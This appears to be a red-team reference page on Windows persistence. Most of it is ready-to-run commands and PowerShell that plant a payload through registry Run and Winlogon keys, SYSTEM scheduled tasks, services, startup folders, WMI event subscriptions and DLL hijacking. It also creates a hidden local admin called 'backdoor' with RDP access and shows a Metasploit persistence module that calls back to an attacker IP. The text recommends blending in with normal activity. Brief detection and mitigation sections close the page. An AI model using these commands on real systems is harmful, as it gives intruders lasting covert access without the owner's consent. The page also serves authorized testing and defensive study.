Windows Persistence

Overview

Windows persistence abuses registry autorun keys, scheduled tasks, services, startup folders, and WMI subscriptions to maintain access. SYSTEM or administrator privileges unlock the most reliable methods, but many techniques work with standard user access. Choose methods that survive reboots and blend with normal Windows activity.

ATT&CK Mapping

  • Tactic: TA0003 - Persistence
  • Techniques:
  • T1053.005 - Scheduled Task/Job: Scheduled Task
  • T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys
  • T1543.003 - Create or Modify System Process: Windows Service
  • T1136.001 - Create Account: Local Account

Prerequisites

  • Shell access to the target (user or administrator)
  • Payload on disk or in-memory execution capability

Techniques

Registry Run Keys

Programs listed in Run keys execute every time a user logs in:

:: Current user — no admin required
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Update /t REG_SZ /d "C:\Users\Public\payload.exe" /f

:: All users — requires admin
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Update /t REG_SZ /d "C:\Windows\Temp\payload.exe" /f

# PowerShell equivalent
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "Update" -Value "C:\Users\Public\payload.exe"

Other autorun registry locations:

:: RunOnce — executes once then deletes itself
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Update /t REG_SZ /d "C:\Users\Public\payload.exe" /f

:: Winlogon — runs at login (requires admin)
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Windows\system32\userinit.exe,C:\Windows\Temp\payload.exe" /f

Scheduled Task Persistence

:: Create scheduled task that runs at logon (requires admin for SYSTEM)
schtasks /create /tn "SystemUpdate" /tr "C:\Windows\Temp\payload.exe" /sc onlogon /ru SYSTEM /f

:: Run every 5 minutes
schtasks /create /tn "SystemUpdate" /tr "C:\Windows\Temp\payload.exe" /sc minute /mo 5 /ru SYSTEM /f

:: Run at startup
schtasks /create /tn "SystemUpdate" /tr "C:\Windows\Temp\payload.exe" /sc onstart /ru SYSTEM /f

# PowerShell — create scheduled task
$action = New-ScheduledTaskAction -Execute "C:\Windows\Temp\payload.exe"
$trigger = New-ScheduledTaskTrigger -AtLogOn
$principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -RunLevel Highest
Register-ScheduledTask -TaskName "SystemUpdate" -Action $action -Trigger $trigger -Principal $principal

User-level task (no admin required):

schtasks /create /tn "UserUpdate" /tr "C:\Users\Public\payload.exe" /sc onlogon /f

Windows Service (Requires Admin)

:: Create a service that runs as SYSTEM on boot
sc create UpdateService binpath= "C:\Windows\Temp\payload.exe" start= auto obj= LocalSystem
sc start UpdateService

:: Query the service
sc query UpdateService

:: Delete when done
sc delete UpdateService

# PowerShell — create service
New-Service -Name "UpdateService" -BinaryPathName "C:\Windows\Temp\payload.exe" -StartupType Automatic
Start-Service -Name "UpdateService"

Startup Folder

Drop a payload or shortcut in the startup folder:

:: Current user startup folder
copy payload.exe "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"

:: All users startup folder (requires admin)
copy payload.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"

# PowerShell — create shortcut in startup
$WshShell = New-Object -ComObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\Update.lnk")
$Shortcut.TargetPath = "C:\Users\Public\payload.exe"
$Shortcut.Save()

Add Local User

:: Create new local admin (requires admin)
net user backdoor Password123! /add
net localgroup Administrators backdoor /add

:: Hide user from login screen (RID >= 1000 still shows by default)
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v backdoor /t REG_DWORD /d 0 /f

Enable RDP for the new user:

net localgroup "Remote Desktop Users" backdoor /add

WMI Event Subscription (Requires Admin)

WMI persistence triggers a payload based on system events:

# Create WMI event subscription — runs payload on startup
$FilterArgs = @{
    Name = 'UpdateFilter'
    EventNameSpace = 'root\CIMv2'
    QueryLanguage = 'WQL'
    Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 120 AND TargetInstance.SystemUpTime < 180"
}
$Filter = Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments $FilterArgs

$ConsumerArgs = @{
    Name = 'UpdateConsumer'
    CommandLineTemplate = 'C:\Windows\Temp\payload.exe'
}
$Consumer = Set-WmiInstance -Namespace root\subscription -Class CommandLineEventConsumer -Arguments $ConsumerArgs

$BindingArgs = @{
    Filter = $Filter
    Consumer = $Consumer
}
Set-WmiInstance -Namespace root\subscription -Class __FilterToConsumerBinding -Arguments $BindingArgs

Query existing WMI subscriptions:

Get-WmiObject -Namespace root\subscription -Class __EventFilter
Get-WmiObject -Namespace root\subscription -Class CommandLineEventConsumer
Get-WmiObject -Namespace root\subscription -Class __FilterToConsumerBinding

DLL Hijacking for Persistence

Place a malicious DLL in a location where a legitimate program searches before finding the real DLL:

:: Find DLL search order issues (use Process Monitor to identify)
:: Common targets: services, scheduled tasks, or autostart programs
:: that load DLLs from writable directories

:: Copy malicious DLL to writable directory in the search path
copy malicious.dll "C:\Program Files\VulnerableApp\missing.dll"

Metasploit Persistence Modules

# Metasploit Framework
# https://github.com/rapid7/metasploit-framework

# From msfconsole — install persistence via local exploit module
use exploit/windows/local/persistence
set SESSION <session_id>
set LHOST <attacker_ip>
run

Detection Methods

Host-Based Detection

  • Unexpected values in Run/RunOnce registry keys
  • Unknown scheduled tasks (particularly those running as SYSTEM)
  • Services with unusual binary paths or descriptions
  • Files in startup folders that don't match installed software
  • WMI event subscriptions (__EventFilter, CommandLineEventConsumer)
  • New local user accounts, especially those in the Administrators group
  • Hidden user accounts in the SpecialAccounts registry key

Network-Based Detection

  • Periodic outbound connections to the same external IP (callback-based persistence)
  • Connections from system processes that don't normally make outbound requests

Mitigation Strategies

  • Monitor autorun locations — audit registry Run keys, scheduled tasks, services, and startup folders
  • Application whitelisting — prevent unauthorized executables from running
  • WMI subscription auditing — monitor for new event filters and consumers
  • Least privilege — limit the number of users with local admin rights
  • Account monitoring — alert on new local account creation

References

MITRE ATT&CK